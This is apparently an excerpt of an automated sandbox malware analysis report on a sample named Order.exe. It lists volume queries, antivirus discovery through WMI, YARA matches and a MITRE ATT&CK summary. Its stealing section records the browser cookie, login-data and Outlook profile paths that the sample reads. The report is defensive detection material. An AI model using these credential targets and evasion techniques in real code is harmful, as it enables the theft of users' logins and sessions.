                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                  Source: C:\Users\user\Desktop\Order.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 5.2.Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.2.Order.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000005.00000002.1904953976.0000000001880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000009.00000002.4144193946.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000009.00000002.4144156725.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000C.00000002.4145802850.0000000004A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000002.1906112434.0000000001D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.4144094992.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0.2.Order.exe.5130000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.Order.exe.3a6a628.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.Order.exe.5130000.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.Order.exe.3a55808.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.Order.exe.3a6a628.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.Order.exe.3a55808.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000000.00000002.1745771597.0000000005130000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1740687497.0000000003A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                  Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                  Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                  Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                  Remote Access Functionality

Source: Yara match | File source: 5.2.Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.1904953976.0000000001880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.4144193946.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.4144156725.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.4145802850.0000000004A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1906112434.0000000001D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4144094992.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.Order.exe.5130000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order.exe.3a6a628.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order.exe.5130000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order.exe.3a55808.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order.exe.3a6a628.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order.exe.3a55808.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1745771597.0000000005130000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1740687497.0000000003A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (a number before a technique name is the count of matched signatures for that technique):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 131 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
